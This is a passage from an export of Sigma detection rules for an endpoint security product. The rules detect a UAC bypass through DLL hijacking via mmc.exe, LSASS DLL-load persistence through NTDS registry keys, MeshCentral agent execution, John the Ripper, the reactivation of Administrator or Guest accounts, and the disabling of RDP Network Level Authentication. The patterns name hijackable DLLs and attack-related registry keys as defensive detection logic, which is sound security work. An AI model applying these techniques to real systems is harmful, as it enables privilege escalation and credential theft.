"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.078704Z",
"creation_date": "2026-03-23T11:45:34.078706Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.078711Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/hfiref0x/UACME"
],
"name": "t1548_002_uac_bypass_mmc.yml",
"content": "title: UAC Bypass Executed via mmc\nid: c143a1ec-5597-4f0e-8998-2d80ce946637\ndescription: |\n Detects an UAC bypass via mmc.exe.\n This alert triggers on mmc.exe loading a dll in system32 directory which is not signed by Microsoft.\n Known missing DLLs:\n - Windows 7 to Windows 10 RS1: elsext.dll\n - Windows 7 to Windows 10 RS3: WbemComn.dll\n - Windows 7 to latest: duser.dll and osksupport.dll\n Adversaries may bypass UAC mechanisms to elevate process privileges on system.\n Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\n It is recommended to investigate the process that created the suspicious loaded DLL and the one that launched mmc.exe.\nreferences:\n - https://github.com/hfiref0x/UACME\ndate: 2020/10/16\nmodified: 2025/05/06\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1574.002\n - attack.t1548.002\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.PrivilegeEscalation\n - classification.Windows.Behavior.UACBypass\n - classification.Windows.Behavior.DLLHijacking\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n Image|endswith: '\\Windows\\System32\\mmc.exe'\n ImageLoaded:\n - '?:\\Windows\\System32\\elsext.dll'\n - '?:\\Windows\\System32\\WbemComn.dll'\n - '?:\\Windows\\System32\\duser.dll'\n - '?:\\Windows\\System32\\osksupport.dll'\n\n filter_signed:\n Signed: 'true'\n Signature|contains:\n - 'Microsoft Windows'\n - 'Microsoft Corporation'\n\n exclusion_known_good_elsext:\n ImageLoaded: '?:\\Windows\\System32\\elsext.dll'\n sha256: '37d2061ba13ff7153f66f0e4828ddf8ed73e87b07a7a67fb4875768da69fbe0e'\n\n exclusion_known_good_wbemcomn:\n ImageLoaded: '?:\\Windows\\System32\\WbemComn.dll'\n sha256:\n - '2ef449149dbf52b1700304f8a3bda9c1060356f44dda6f47369c29cfd2b51dfe'\n - 
'a734a20357026c42950394682a52cbc3af956d09f1949e1b4e95467e999bc428'\n - '7108bbae5b91ed6784bd32547f7bd9dead392e47acab29dc057aef7cfb746f3c'\n\n exclusion_known_good_duser:\n ImageLoaded: '?:\\Windows\\System32\\duser.dll'\n sha256:\n - '56f781cdcd03f6fa21b38f133bd1db902d53d9cf2708d12760d353346221351b'\n - 'c7be8a83ef861073c9f9e510a579d42cfae6dd04a92bdd98273e0c8a99a413cc'\n - 'dd663029b2eb7b12fdb00fce403d8326141e540e3b9ce84cd5871473d3e2e2cf'\n - '5ebebe1220e070847677a3c3a91ea7a8cde663467335a9e7e801dffd97e14ec2'\n - '9168110ef404bf179888af4a0f02b2817f020bfb16351778f2ddd6915c92f190'\n - '12afc921ef64950e272cff3cd5ffe0d0667c4a1a47783b32a1cc15da91443fe3'\n - '2dba9f60dad43c8abda1bf82f828ca544183bc2f67c0bc70f8743e31bbdb390d'\n - 'bce6a4f5d0878a91a7e5fa0a962c0000efd5e9624c8cc3a4f3453413d3c7c842'\n\n exclusion_opera:\n ProcessImage|endswith: 'AppData\\Local\\Programs\\Opera\\opera.exe'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "c143a1ec-5597-4f0e-8998-2d80ce946637",
"rule_name": "UAC Bypass Executed via mmc",
"rule_description": "Detects a UAC bypass via mmc.exe.\nThis alert triggers when mmc.exe loads, from the System32 directory, one of the DLLs below that is not signed by Microsoft; these DLLs are absent on the listed Windows versions, so a planted file with that name gets loaded (DLL hijacking).\nKnown missing DLLs:\n - Windows 7 to Windows 10 RS1: elsext.dll\n - Windows 7 to Windows 10 RS3: WbemComn.dll\n - Windows 7 to latest: duser.dll and osksupport.dll\nAdversaries may bypass UAC mechanisms to elevate process privileges on the system.\nWindows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\nKnown-good builds of elsext.dll, WbemComn.dll and duser.dll are excluded by SHA-256 hash, so an unsigned copy with a different hash still alerts.\nIt is recommended to investigate the process that created the suspicious loaded DLL and the one that launched mmc.exe.\n",
"rule_creation_date": "2020-10-16",
"rule_modified_date": "2025-05-06",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1548.002",
"attack.t1574.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "c1464388-eec2-4bda-914f-afaab4ab765a",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.071856Z",
"creation_date": "2026-03-23T11:45:34.071858Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.071862Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"http://redplait.blogspot.com/2015/02/lsasrvdlllsaploadlsadbextensiondll.html",
"https://blog.xpnsec.com/exploring-mimikatz-part-1/",
"https://twitter.com/SBousseaden/status/1183745981189427200"
],
"name": "t1112_persistence_registry_lsass_ntds.yml",
"content": "title: LSASS NTDS Undocumented DLL Load Persistence Added\nid: c1464388-eec2-4bda-914f-afaab4ab765a\ndescription: |\n Detects a modification of undocumented registry keys allowing to load arbitrary DLLs in LSASS.\n Attackers may use these DLLs to execute arbitrary code in LSASS to access credentials or for persistence purposes.\n It is recommended to analyze the specified DLL for malicious content and the process making the registry modification for any other suspicious actions.\nreferences:\n - http://redplait.blogspot.com/2015/02/lsasrvdlllsaploadlsadbextensiondll.html\n - https://blog.xpnsec.com/exploring-mimikatz-part-1/\n - https://twitter.com/SBousseaden/status/1183745981189427200\ndate: 2020/10/02\nmodified: 2025/02/14\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1112\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.Persistence\n - classification.Windows.Behavior.LSASSAccess\n - classification.Windows.Behavior.SystemModification\n - classification.Windows.Behavior.CredentialAccess\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection_set:\n EventType: 'SetValue'\n TargetObject:\n - 'HKLM\\SYSTEM\\CurrentControlSet\\Services\\NTDS\\LsaDbExtPt*'\n - 'HKLM\\SYSTEM\\CurrentControlSet\\Services\\NTDS\\DirectoryServiceExtPt*'\n\n selection_rename:\n EventType:\n - 'RenameValue'\n - 'RenameKey'\n NewName:\n - 'HKLM\\SYSTEM\\CurrentControlSet\\Services\\NTDS\\LsaDbExtPt*'\n - 'HKLM\\SYSTEM\\CurrentControlSet\\Services\\NTDS\\DirectoryServiceExtPt*'\n\n filter_empty:\n Details: '(Empty)'\n\n exclusion_tiworker:\n Image|endswith: '\\Windows\\WinSxS\\\\*\\tiworker.exe'\n\n exclusion_lsadb:\n Image: '?:\\Windows\\System32\\lsass.exe'\n TargetObject: 'HKLM\\SYSTEM\\CurrentControlSet\\Services\\NTDS\\LsaDbExtPt'\n Details: '?systemroot?\\system32\\lsadb.dll'\n\n exclusion_ntdsa:\n Image: '?:\\Windows\\System32\\lsass.exe'\n TargetObject: 
'HKLM\\SYSTEM\\CurrentControlSet\\Services\\NTDS\\DirectoryServiceExtPt'\n Details: '?systemroot?\\system32\\ntdsa.dll'\n\n condition: 1 of selection_* and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "c1464388-eec2-4bda-914f-afaab4ab765a",
"rule_name": "LSASS NTDS Undocumented DLL Load Persistence Added",
"rule_description": "Detects a modification of undocumented registry values (LsaDbExtPt and DirectoryServiceExtPt under HKLM\\SYSTEM\\CurrentControlSet\\Services\\NTDS) that allow arbitrary DLLs to be loaded into LSASS.\nAttackers may use such DLLs to execute arbitrary code inside LSASS, in order to access credentials or to persist.\nThe default values written by lsass.exe itself (lsadb.dll and ntdsa.dll under the system root) and empty values are excluded; any other value, whether set directly or introduced by renaming a value or key, alerts.\nIt is recommended to analyze the specified DLL for malicious content and to review the process making the registry modification for any other suspicious actions.\n",
"rule_creation_date": "2020-10-02",
"rule_modified_date": "2025-02-14",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1112"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "c170382c-1feb-48e7-8335-32fbf5b27583",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.082867Z",
"creation_date": "2026-03-23T11:45:34.082881Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.082886Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://twitter.com/malmoeb/status/1558861977379868672",
"https://meshcentral.com/info/",
"https://attack.mitre.org/techniques/T1219/002/"
],
"name": "t1219_002_suspicious_meshcentral_agent_execution.yml",
"content": "title: Suspicious MeshCentral Agent Execution\nid: c170382c-1feb-48e7-8335-32fbf5b27583\ndescription: |\n Detects the suspicious execution of a MeshCentral agent being executed on the target host.\n MeshCentral is a remote host control tool that can be used maliciously as a Remote Access Tool (RAT).\n It is recommended to investigate how the Mesh Agent Service was installed.\nreferences:\n - https://twitter.com/malmoeb/status/1558861977379868672\n - https://meshcentral.com/info/\n - https://attack.mitre.org/techniques/T1219/002/\ndate: 2022/08/23\nmodified: 2025/07/25\nauthor: HarfangLab\ntags:\n - attack.command_and_control\n - attack.t1219.002\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.RMM.MeshCentral\n - classification.Windows.Behavior.CommandAndControl\n - classification.Windows.Behavior.InitialAccess\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n - ProcessInternalName: 'MeshAgent'\n - ProcessDescription: 'Mesh Agent Service'\n - ProcessProduct: 'Mesh Agent Service'\n - ProcessSignatureSignerIssuerName|startswith: 'MeshCentralRoot-'\n - Image: '?:\\Program Files\\Mesh Agent\\MeshAgent.exe'\n\n exclusion_tacticalrmm:\n ParentImage:\n - '?:\\Program Files\\TacticalAgent\\tacticalrmm.exe'\n - '?:\\Program Files (x86)\\TacticalAgent\\tacticalrmm.exe'\n\n exclusion_benign:\n CommandLine:\n - '?:\\Program Files\\Mesh Agent\\MeshAgent.exe --installedByUser=S-1-5-21-*'\n - '?:\\Program Files (x86)\\Mesh Agent\\MeshAgent.exe --installedByUser=S-1-5-21-*'\n - '?:\\Program Files\\Mesh Agent\\MeshAgent.exe'\n - '?:\\Program Files (x86)\\Mesh Agent\\MeshAgent.exe'\n - '?:\\Program Files\\Mesh Agent\\MeshAgent.exe -nodeid'\n - '?:\\Program Files (x86)\\Mesh Agent\\MeshAgent.exe -nodeid'\n - '?:\\Program Files\\Mesh Agent\\MeshAgent.update.exe -b64exec *'\n - '?:\\Program Files\\Mesh Agent\\MeshAgent.exe -b64exec *'\n - '-kvm1'\n - '-kvm1 -coredump'\n - '--slave'\n - 'MeshAgent.exe -b64exec 
*'\n - '?:\\Program Files\\Mesh Agent\\meshagent.exe state'\n - '?:\\Program Files\\Mesh Agent\\MeshAgent.exe -funinstall --meshServiceName=Mesh Agent'\n - '?:\\Program Files\\Mesh Agent\\MeshAgent.exe --WebProxy=*'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "c170382c-1feb-48e7-8335-32fbf5b27583",
"rule_name": "Suspicious MeshCentral Agent Execution",
"rule_description": "Detects the suspicious execution of a MeshCentral agent on the host, matched on the agent's internal name, description, product, signer or install path, outside of the known benign command lines of an installed Mesh Agent Service.\nMeshCentral is a legitimate remote host control tool that can be used maliciously as a Remote Access Tool (RAT).\nIt is recommended to investigate how the Mesh Agent Service was installed and which MeshCentral server the agent connects to.\n",
"rule_creation_date": "2022-08-23",
"rule_modified_date": "2025-07-25",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control"
],
"rule_technique_tags": [
"attack.t1219.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "c187a1fd-f61c-421b-b453-2560ba9583c1",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.613422Z",
"creation_date": "2026-03-23T11:45:34.613426Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.613433Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/openwall/john",
"https://attack.mitre.org/techniques/T1110/001/",
"https://attack.mitre.org/techniques/T1110/002/",
"https://attack.mitre.org/techniques/T1110/003/",
"https://attack.mitre.org/techniques/T1110/004/",
"https://attack.mitre.org/techniques/T1003/008/",
"https://attack.mitre.org/techniques/T1078/"
],
"name": "t1110_002_john.yml",
"content": "title: John the Ripper Execution\nid: c187a1fd-f61c-421b-b453-2560ba9583c1\ndescription: |\n Detects the execution of John the Ripper, an Open Source password cracker.\n John the Ripper is a password-cracking tool that helps attackers identify weak or compromised passwords by performing brute-force and dictionary attacks.\n It is recommended to verify if the usage of this tool is legitimate.\nreferences:\n - https://github.com/openwall/john\n - https://attack.mitre.org/techniques/T1110/001/\n - https://attack.mitre.org/techniques/T1110/002/\n - https://attack.mitre.org/techniques/T1110/003/\n - https://attack.mitre.org/techniques/T1110/004/\n - https://attack.mitre.org/techniques/T1003/008/\n - https://attack.mitre.org/techniques/T1078/\ndate: 2021/09/14\nmodified: 2025/01/15\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1110.001\n - attack.t1110.002\n - attack.t1110.003\n - attack.t1110.004\n - attack.t1003.008\n - attack.t1078\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.HackTool.John\n - classification.Linux.Behavior.CredentialAccess\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection:\n Image|endswith:\n - '/john'\n - '/unshadow'\n condition: selection\nlevel: medium\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "c187a1fd-f61c-421b-b453-2560ba9583c1",
"rule_name": "John the Ripper Execution",
"rule_description": "Detects the execution of John the Ripper, an open-source password cracker.\nJohn the Ripper is a password-cracking tool that helps attackers identify weak or compromised passwords by performing brute-force and dictionary attacks.\nThe rule matches on the binary name only (john or unshadow), so a renamed copy is not detected.\nIt is recommended to verify whether the usage of this tool is legitimate, e.g. an authorized password audit.\n",
"rule_creation_date": "2021-09-14",
"rule_modified_date": "2025-01-15",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access"
],
"rule_technique_tags": [
"attack.t1003.008",
"attack.t1078",
"attack.t1110.001",
"attack.t1110.002",
"attack.t1110.003",
"attack.t1110.004"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "c1bddf11-5142-49af-a953-f8c3d1adc1a0",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.621955Z",
"creation_date": "2026-03-23T11:45:34.621963Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.621967Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1078/001/",
"https://attack.mitre.org/techniques/T1098/"
],
"name": "t1564_net_enable_account.yml",
"content": "title: Sensitive User Account Enabled via net.exe\nid: c1bddf11-5142-49af-a953-f8c3d1adc1a0\ndescription: |\n Detects a sensitive account being activated via net1.exe.\n Adversaries may reactivate sensitive accounts such as Guest or local administrator and use them for persistence purposes.\n It is recommended to investigate the process performing this action to determine its legitimacy and any suspicious authentications using the enabled account.\nreferences:\n - https://attack.mitre.org/techniques/T1078/001/\n - https://attack.mitre.org/techniques/T1098/\ndate: 2021/12/27\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1078.001\n - attack.t1098\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.AccountManipulation\n - classification.Windows.Behavior.Persistence\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_binary:\n - Image|endswith: '\\net1.exe'\n # Renamed binaries\n - OriginalFileName: 'net1.exe'\n\n selection_account:\n CommandLine|contains: '/active:y'\n\n selection_enable:\n CommandLine|contains:\n - 'administrator'\n - 'administrateur'\n - 'guest'\n - 'invité'\n\n exclusion_template_gpscript:\n ProcessAncestors|contains: '?:\\Windows\\System32\\gpscript.exe|?:\\Windows\\System32\\svchost.exe'\n\n exclusion_diane:\n - ProcessGrandparentImage|endswith:\n - '\\DianeUpdate.exe'\n - '\\DiaUpdate.exe'\n ProcessGrandparentSignature: 'BOW MEDICAL SAS'\n - ProcessGrandparentImage|endswith:\n - '\\DiaUpdate.exe'\n - '\\DianeUpdate.exe'\n ProcessGrandparentDescription: 'Application Diane'\n - ProcessGrandparentImage|endswith:\n - '\\DiaUpdate.exe'\n - '\\DianeUpdate.exe'\n ProcessGrandparentCompany: 'BOW MEDICAL'\n\n exclusion_ancestors:\n Ancestors|contains:\n - '?:\\Program Files (x86)\\Microsoft Intune Management Extension\\AgentExecutor.exe'\n - '?:\\Program Files\\Microsoft Intune Management Extension\\AgentExecutor.exe'\n - 
'?:\\Windows\\System32\\oobe\\Setup.exe|?:\\Windows\\System32\\oobe\\windeploy.exe'\n - '?:\\Program Files (x86)\\CentraStage\\CagService.exe|?:\\Windows\\System32\\services.exe'\n - '?:\\Windows\\AdminArsenal\\PDQDeployRunner\\service-?\\PDQDeployRunner-?.exe'\n - '?:\\Program Files (x86)\\\\*\\winpty-agent.exe'\n - '?:\\Program Files (x86)\\wapt\\wapt-get.exe'\n - '?:\\MININT\\Tools\\X64\\TsManager.exe'\n - '?:\\Program Files\\Altiris\\Dagent\\dagent.exe'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: medium\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "c1bddf11-5142-49af-a953-f8c3d1adc1a0",
"rule_name": "Sensitive User Account Enabled via net.exe",
"rule_description": "Detects a sensitive account (Administrator, Administrateur, Guest or Invité) being enabled via net1.exe with the /active:y option; renamed copies of net1.exe are matched on their original file name.\nAdversaries may reactivate sensitive accounts such as Guest or the local administrator and use them for persistence purposes.\nIt is recommended to investigate the process performing this action to determine its legitimacy and to look for any suspicious authentications using the enabled account.\n",
"rule_creation_date": "2021-12-27",
"rule_modified_date": "2026-03-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1078.001",
"attack.t1098"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "c2271b8c-4c7c-4704-8b7c-2780abf2d9d2",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.620476Z",
"creation_date": "2026-03-23T11:45:34.620478Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.620482Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://learn.microsoft.com/en-us/troubleshoot/azure/virtual-machines/cannot-connect-rdp-azure-vm",
"https://thedfirreport.com/2021/05/12/conti-ransomware/",
"https://attack.mitre.org/techniques/T1112/",
"https://attack.mitre.org/techniques/T1021/001/",
"https://attack.mitre.org/techniques/T1562/001/"
],
"name": "t1112_nla_disable.yml",
"content": "title: NLA for Remote Desktop Services Disabled\nid: c2271b8c-4c7c-4704-8b7c-2780abf2d9d2\ndescription: |\n Detects when the Network Level Authentication (NLA) for Remote Desktop Services (RDP) is disabled via a registry modification.\n NLA is a feature of Remote Desktop Services that requires the connecting user to authenticate themselves before a session is established.\n Adversaries can use this technique to allow themselves to arbitrarily connect to hosts via RDP.\n It is recommended to analyze the process responsible for the disabling of NLA to determine its legitimacy and to look for subsequent suspicious RDP sessions on this host.\nreferences:\n - https://learn.microsoft.com/en-us/troubleshoot/azure/virtual-machines/cannot-connect-rdp-azure-vm\n - https://thedfirreport.com/2021/05/12/conti-ransomware/\n - https://attack.mitre.org/techniques/T1112/\n - https://attack.mitre.org/techniques/T1021/001/\n - https://attack.mitre.org/techniques/T1562/001/\ndate: 2025/01/28\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1112\n - attack.t1562.001\n - attack.lateral_movement\n - attack.t1021.001\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.SystemModification\n - classification.Windows.Behavior.ImpairDefenses\n - classification.Windows.Behavior.Lateralization\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: 'SetValue'\n TargetObject:\n - 'HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows NT\\Terminal Services\\UserAuthentication'\n - 'HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp\\UserAuthentication'\n Details:\n - 'DWORD (0x00000000)'\n - 'QWORD (0x00000000-0x00000000)'\n # Parent information of a process can be missing.\n ProcessParentImage|contains: '?'\n\n exclusion_template_gpo:\n ProcessImage|endswith: '\\svchost.exe'\n ProcessCommandLine:\n - 
'?:\\Windows\\system32\\svchost.exe -k GPSvcGroup'\n - '?:\\WINDOWS\\system32\\svchost.exe -k GPSvcGroup -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s gpsvc'\n - '?:\\Windows\\System32\\svchost.exe -k netsvcs' # (Windows Server 2012 and 2016)\n - '?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p'\n - '?:\\WINDOWS\\system32\\svchost.exe -k UserProfileService -p -s gpsvc'\n ProcessUserSID: 'S-1-5-18'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_schedule:\n ProcessParentCommandLine: '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s Schedule'\n\n exclusion_windeploy:\n ProcessCommandLine:\n - '?:\\$WINDOWS.~BT\\Sources\\SetupPlatform.exe /preoobe'\n - '?:\\Windows\\System32\\oobe\\Setup.exe'\n ProcessParentImage: '?:\\Windows\\System32\\oobe\\windeploy.exe'\n\n exclusion_systemproperties:\n ProcessImage:\n - '?:\\Windows\\System32\\SystemSettingsAdminFlows.exe'\n - '?:\\Windows\\System32\\SystemPropertiesRemote.exe'\n - '?:\\Windows\\System32\\SystemPropertiesAdvanced.exe'\n - '?:\\Windows\\System32\\SystemPropertiesComputerName.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Windows'\n\n exclusion_siemens:\n - ProcessImage: '?:\\Windows\\Temp\\TSplusInstaller\\Setup-Siemens.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'TSplus SAS'\n - ProcessImage: '?:\\Windows\\Temp\\is-*.tmp\\svcr.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'JWTS SASU'\n - ProcessGrandparentImage|endswith: '\\syngoInstaller.exe'\n ProcessGrandparentSigned: 'true'\n ProcessGrandparentSignature: 'Siemens AG'\n - ProcessAncestors|contains: '?:\\Program Files\\Siemens\\syngo\\bin\\syngo.Common.LCMService.exe'\n\n exclusion_systemprop:\n ProcessImage|startswith: '?:\\Windows\\System32\\SystemProperties'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Windows'\n\n exclusion_teleport:\n ProcessImage|contains: 'teleport-windows-auth-setup'\n ProcessSignature: 
'Gravitational, Inc.'\n\n exclusion_syngo:\n ProcessGrandparentImage|contains: '\\syngo_delta_pkg\\Setup\\syngoInstaller.exe'\n\n exclusion_omadm:\n ProcessImage: '?:\\Windows\\System32\\omadmclient.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Windows'\n\n exclusion_deviceenroller:\n ProcessImage: '?:\\Windows\\System32\\DeviceEnroller.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Windows'\n\n exclusion_svcr:\n ProcessImage|endswith: '\\svcr.exe'\n ProcessSigned: 'true'\n ProcessSignature|contains: 'Remote Access World SAS'\n\n exclusion_ccmexec:\n ProcessOriginalFileName: 'CcmExec.exe'\n ProcessUserSID: 'S-1-5-18'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_tiworker:\n ProcessCommandLine: '?:\\Windows\\WinSxS\\amd64_microsoft-windows-servicingstack_*\\tiworker.exe'\n\n exclusion_wmiprvse:\n Image: '?:\\Windows\\System32\\wbem\\WmiPrvSE.exe'\n\n # NOTE: broad exclusion with no signature check - any image under Program Files, or any cmd.exe child whose grandparent is there, is trusted.\n # Writing this HKLM value already requires administrative rights, which also allow dropping a binary into Program Files; review this exclusion for your environment.\n exclusion_programfiles:\n - ProcessImage|startswith:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n - ProcessGrandparentImage|startswith:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n ProcessParentImage: '?:\\Windows\\System32\\cmd.exe'\n\n exclusion_azure:\n ProcessAncestors|contains: 